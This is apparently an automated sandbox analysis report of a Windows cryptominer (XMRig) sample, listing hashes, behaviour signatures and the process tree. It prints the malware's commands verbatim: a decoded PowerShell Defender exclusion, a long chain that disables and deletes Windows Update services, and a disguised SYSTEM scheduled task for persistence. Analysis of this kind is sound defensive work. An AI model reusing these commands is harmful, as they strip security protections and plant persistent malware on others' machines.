Analysis
- max time kernel: 89s
- max time network: 73s
- platform: windows10_x64
- resource: win10-20220414-en
- submitted: 18-05-2022 21:09
- static task: static1
General
- Target: 003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33.exe
- Size: 4.1MB
- MD5: c1fd183c8ef30db8e2be4ab51e42501f
- SHA1: 67a5ba161cafa7f0471f03968dd0f94cfb21aa1a
- SHA256: 003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33
- SHA512: 8b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0
Signatures
Modifies security service 2 TTPs 5 IoCs
Processes: reg.exe
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Parameters (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\Security (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\0 (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo\1 (reg.exe)
- Key deleted \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\wuauserv\TriggerInfo (reg.exe)
XMRig Miner Payload 5 IoCs
Resources matching yara rule:
- behavioral1/memory/5116-387-0x000000014036DB84-mapping.dmp: xmrig
- behavioral1/memory/5116-386-0x0000000140000000-0x0000000140803000-memory.dmp: xmrig
- behavioral1/memory/5116-389-0x0000000140000000-0x0000000140803000-memory.dmp: xmrig
- behavioral1/memory/5116-390-0x0000000140000000-0x0000000140803000-memory.dmp: xmrig
- behavioral1/memory/5116-392-0x0000000140000000-0x0000000140803000-memory.dmp: xmrig
Executes dropped EXE 1 IoCs
Processes: updater.exe
- PID 8 updater.exe
Possible privilege escalation attempt 4 IoCs
Processes: takeown.exe, icacls.exe
- PID 4100 takeown.exe
- PID 3468 icacls.exe
- PID 4584 takeown.exe
- PID 4896 icacls.exe
Stops running service(s) 3 TTPs
Modifies file permissions 1 TTPs 4 IoCs
Processes: takeown.exe, icacls.exe
- PID 4100 takeown.exe
- PID 3468 icacls.exe
- PID 4584 takeown.exe
- PID 4896 icacls.exe
Drops file in System32 directory 3 IoCs
Processes: powershell.exe, conhost.exe
- File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log (powershell.exe)
- File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log (conhost.exe)
- File created C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive (powershell.exe)
Suspicious use of SetThreadContext 2 IoCs
Processes: conhost.exe
- PID 976 set thread context of 356 (conhost.exe -> conhost.exe)
- PID 976 set thread context of 5116 (conhost.exe -> explorer.exe)
Drops file in Program Files directory 3 IoCs
Processes: conhost.exe
- File created C:\Program Files\Chrome\updater.exe (conhost.exe)
- File opened for modification C:\Program Files\Chrome\updater.exe (conhost.exe)
- File created C:\Program Files\Google\Libs\WR64.sys (conhost.exe)
Launches sc.exe
Sc.exe is a Windows utility to control services on the system.
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Modifies data under HKEY_USERS 56 IoCs
Modifies registry key 1 TTPs 18 IoCs
Processes: reg.exe (18 instances)
- PIDs 4608, 2168, 4592, 4600, 2700, 4864, 4960, 1580, 4132, 4628, 3808, 4944, 2948, 4988, 5112, 1716, 4556, 5020 (all reg.exe)
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes: powershell.exe, conhost.exe, powershell.exe, conhost.exe, explorer.exe
- PID 3496 powershell.exe (3 events)
- PID 2132 conhost.exe (1 event)
- PID 1840 powershell.exe (3 events)
- PID 976 conhost.exe (1 event)
- PID 5116 explorer.exe (56 events)
Suspicious behavior: LoadsDriver 1 IoCs
Processes:
- PID 624
Suspicious use of AdjustPrivilegeToken 41 IoCs
Processes: powershell.exe, conhost.exe, takeown.exe, powershell.exe, conhost.exe, takeown.exe, explorer.exe
- PID 3496 powershell.exe: SeDebugPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemProfilePrivilege, SeSystemtimePrivilege, SeProfSingleProcessPrivilege, SeIncBasePriorityPrivilege, SeCreatePagefilePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeDebugPrivilege, SeSystemEnvironmentPrivilege, SeRemoteShutdownPrivilege, SeUndockPrivilege, SeManageVolumePrivilege, 33, 34, 35, 36
- PID 2132 conhost.exe: SeDebugPrivilege
- PID 4100 takeown.exe: SeTakeOwnershipPrivilege
- PID 1840 powershell.exe: SeDebugPrivilege, SeAssignPrimaryTokenPrivilege, SeIncreaseQuotaPrivilege, SeSecurityPrivilege, SeTakeOwnershipPrivilege, SeLoadDriverPrivilege, SeSystemtimePrivilege, SeBackupPrivilege, SeRestorePrivilege, SeShutdownPrivilege, SeSystemEnvironmentPrivilege, SeUndockPrivilege, SeManageVolumePrivilege
- PID 976 conhost.exe: SeDebugPrivilege
- PID 4584 takeown.exe: SeTakeOwnershipPrivilege
- PID 5116 explorer.exe: SeLockMemoryPrivilege, SeLockMemoryPrivilege
Suspicious use of WriteProcessMemory 64 IoCs
Processes: 003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33.exe, conhost.exe, cmd.exe, cmd.exe, cmd.exe, cmd.exe, updater.exe
Writes (source PID -> target PID, source process -> target process; identical consecutive rows collapsed with a count):
- 2016 -> 2132 (003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33.exe -> conhost.exe) x3
- 2132 -> 2688 (conhost.exe -> cmd.exe) x2
- 2688 -> 3496 (cmd.exe -> powershell.exe) x2
- 2132 -> 4948 (conhost.exe -> cmd.exe) x2
- 4948 -> 5028 (cmd.exe -> sc.exe) x2
- 4948 -> 4864 (cmd.exe -> sc.exe) x2
- 4948 -> 1260 (cmd.exe -> sc.exe) x2
- 4948 -> 2032 (cmd.exe -> sc.exe) x2
- 4948 -> 2796 (cmd.exe -> sc.exe) x2
- 4948 -> 2948 (cmd.exe -> reg.exe) x2
- 4948 -> 4960 (cmd.exe -> reg.exe) x2
- 4948 -> 4988 (cmd.exe -> reg.exe) x2
- 4948 -> 1580 (cmd.exe -> reg.exe) x2
- 4948 -> 5112 (cmd.exe -> reg.exe) x2
- 4948 -> 4100 (cmd.exe -> takeown.exe) x2
- 4948 -> 3468 (cmd.exe -> icacls.exe) x2
- 2132 -> 3520 (conhost.exe -> cmd.exe) x2
- 3520 -> 4848 (cmd.exe -> schtasks.exe) x2
- 4948 -> 4132 (cmd.exe -> reg.exe) x2
- 4948 -> 1716 (cmd.exe -> reg.exe) x2
- 4948 -> 4628 (cmd.exe -> reg.exe) x2
- 4948 -> 4608 (cmd.exe -> reg.exe) x2
- 4948 -> 3944 (cmd.exe -> schtasks.exe) x2
- 4948 -> 3912 (cmd.exe -> schtasks.exe) x2
- 4948 -> 4224 (cmd.exe -> schtasks.exe) x2
- 4948 -> 3784 (cmd.exe -> schtasks.exe) x2
- 4948 -> 3780 (cmd.exe -> schtasks.exe) x2
- 4948 -> 3032 (cmd.exe -> schtasks.exe) x2
- 4948 -> 2084 (cmd.exe -> schtasks.exe) x2
- 2132 -> 3192 (conhost.exe -> cmd.exe) x2
- 3192 -> 4280 (cmd.exe -> schtasks.exe) x2
- 8 -> 976 (updater.exe -> conhost.exe) x1
Processes
- C:\Users\Admin\AppData\Local\Temp\003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33.exe
  command: "C:\Users\Admin\AppData\Local\Temp\003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33.exe"
  signatures: Suspicious use of WriteProcessMemory
  - C:\Windows\System32\conhost.exe
    command: "C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33.exe"
    signatures: Drops file in Program Files directory; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken; Suspicious use of WriteProcessMemory
    - C:\Windows\System32\cmd.exe
      command: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A"
      (the UTF-16LE base64 decodes to: <#ucc#> Add-MpPreference <#lzq#> -ExclusionPath @($env:UserProfile,$env:SystemDrive) <#iysd#> -Force <#chi#>, i.e. a Defender exclusion for the user profile and the system drive, padded with junk comments)
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command: powershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A"
        signatures: Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\cmd.exe
      command: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\sc.exe
        command: sc stop UsoSvc
      - C:\Windows\system32\sc.exe
        command: sc stop WaaSMedicSvc
      - C:\Windows\system32\sc.exe
        command: sc stop wuauserv
      - C:\Windows\system32\sc.exe
        command: sc stop bits
      - C:\Windows\system32\sc.exe
        command: sc stop dosvc
      - C:\Windows\system32\reg.exe
        command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        signatures: Modifies registry key
      - C:\Windows\system32\reg.exe
        command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        signatures: Modifies registry key
      - C:\Windows\system32\reg.exe
        command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        signatures: Modifies security service; Modifies registry key
      - C:\Windows\system32\reg.exe
        command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        signatures: Modifies registry key
      - C:\Windows\system32\reg.exe
        command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        signatures: Modifies registry key
      - C:\Windows\system32\takeown.exe
        command: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\icacls.exe
        command: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        signatures: Possible privilege escalation attempt; Modifies file permissions
      - C:\Windows\system32\reg.exe
        command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        signatures: Modifies registry key
      - C:\Windows\system32\reg.exe
        command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        signatures: Modifies registry key
      - C:\Windows\system32\reg.exe
        command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        signatures: Modifies registry key
      - C:\Windows\system32\reg.exe
        command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        signatures: Modifies registry key
      - C:\Windows\system32\schtasks.exe
        command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
      - C:\Windows\system32\schtasks.exe
        command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
      - C:\Windows\system32\schtasks.exe
        command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
      - C:\Windows\system32\schtasks.exe
        command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
      - C:\Windows\system32\schtasks.exe
        command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
      - C:\Windows\system32\schtasks.exe
        command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
      - C:\Windows\system32\schtasks.exe
        command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    - C:\Windows\System32\cmd.exe
      command: "C:\Windows\System32\cmd.exe" cmd /c schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '^"C:\Program Files\Chrome\updater.exe^"'
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\schtasks.exe
        command: schtasks /create /f /sc onlogon /rl highest /ru "System" /tn "GoogleUpdateTaskMachineQC" /tr '"C:\Program Files\Chrome\updater.exe"'
        signatures: Creates scheduled task(s)
    - C:\Windows\System32\cmd.exe
      command: "C:\Windows\System32\cmd.exe" cmd /c schtasks /run /tn "GoogleUpdateTaskMachineQC"
      signatures: Suspicious use of WriteProcessMemory
      - C:\Windows\system32\schtasks.exe
        command: schtasks /run /tn "GoogleUpdateTaskMachineQC"
- C:\Program Files\Chrome\updater.exe
  command: "C:\Program Files\Chrome\updater.exe"
  signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
  - C:\Windows\System32\conhost.exe
    command: "C:\Windows\System32\conhost.exe" "C:\Program Files\Chrome\updater.exe"
    signatures: Drops file in System32 directory; Suspicious use of SetThreadContext; Drops file in Program Files directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\cmd.exe
      command: "C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A"
      (same encoded Add-MpPreference exclusion command as in the first run)
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        command: powershell -EncodedCommand "PAAjAHUAYwBjACMAPgAgAEEAZABkAC0ATQBwAFAAcgBlAGYAZQByAGUAbgBjAGUAIAA8ACMAbAB6AHEAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAaQB5AHMAZAAjAD4AIAAtAEYAbwByAGMAZQAgADwAIwBjAGgAaQAjAD4A"
        signatures: Drops file in System32 directory; Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
    - C:\Windows\System32\cmd.exe
      command: "C:\Windows\System32\cmd.exe" cmd /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
      - C:\Windows\system32\sc.exe
        command: sc stop UsoSvc
      - C:\Windows\system32\sc.exe
        command: sc stop WaaSMedicSvc
      - C:\Windows\system32\sc.exe
        command: sc stop wuauserv
      - C:\Windows\system32\sc.exe
        command: sc stop bits
      - C:\Windows\system32\sc.exe
        command: sc stop dosvc
      - C:\Windows\system32\reg.exe
        command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
        signatures: Modifies registry key
      - C:\Windows\system32\reg.exe
        command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
        signatures: Modifies registry key
      - C:\Windows\system32\reg.exe
        command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
        signatures: Modifies registry key
      - C:\Windows\system32\reg.exe
        command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
        signatures: Modifies registry key
      - C:\Windows\system32\reg.exe
        command: reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
        signatures: Modifies registry key
      - C:\Windows\system32\takeown.exe
        command: takeown /f C:\Windows\System32\WaaSMedicSvc.dll
        signatures: Possible privilege escalation attempt; Modifies file permissions; Suspicious use of AdjustPrivilegeToken
      - C:\Windows\system32\icacls.exe
        command: icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
        signatures: Possible privilege escalation attempt; Modifies file permissions
      - C:\Windows\system32\reg.exe
        command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
        signatures: Modifies registry key
      - C:\Windows\system32\reg.exe
        command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
        signatures: Modifies registry key
      - C:\Windows\system32\reg.exe
        command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
        signatures: Modifies registry key
      - C:\Windows\system32\reg.exe
        command: reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
        signatures: Modifies registry key
      - C:\Windows\system32\schtasks.exe
        command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
      - C:\Windows\system32\schtasks.exe
        command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
      - C:\Windows\system32\schtasks.exe
        command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
      - C:\Windows\system32\schtasks.exe
        command: SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
      - C:\Windows\system32\schtasks.exe
        command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
      - C:\Windows\system32\schtasks.exe
        command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
      - C:\Windows\system32\schtasks.exe
        command: SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
    - C:\Windows\System32\conhost.exe
      command: C:\Windows\System32\conhost.exe
      - C:\Windows\System32\conhost.exe
        command: "C:\Windows\System32\conhost.exe" "wknkxnouyh"
    - C:\Windows\explorer.exe
      command: C:\Windows\explorer.exe fffmrxkhevshsdek0
      signatures: Modifies data under HKEY_USERS; Suspicious behavior: EnumeratesProcesses; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Downloads
- C:\Program Files\Chrome\updater.exe (same hashes as the submitted sample)
  Filesize: 4.1MB
  MD5: c1fd183c8ef30db8e2be4ab51e42501f
  SHA1: 67a5ba161cafa7f0471f03968dd0f94cfb21aa1a
  SHA256: 003bf16a4661cccc90dd7410ab077d356a3d434effe1047a6df1c133b1746b33
  SHA512: 8b3060ae4c8e8e7f376ed40ac9741206f9d82f3185571a4edd2be05de5240ae743356cd498a842f58f969286e80014ecae29423a618b520d97cedc5a01ddc2f0
- C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\conhost.exe.log
  Filesize: 539B
  MD5: 84f2160705ac9a032c002f966498ef74
  SHA1: e9f3db2e1ad24a4f7e5c203af03bbc07235e704c
  SHA256: 7840ca7ea27e8a24ebc4877774be6013ab4f81d1eb83c121e4c3290ceb532d93
  SHA512: f41c289770d8817ee612e53880d3f6492d50d08fb5104bf76440c2a93539dd25f6f15179b318e67b9202aabbe802941f80ac2dbadfd6ff1081b0d37c33f9da57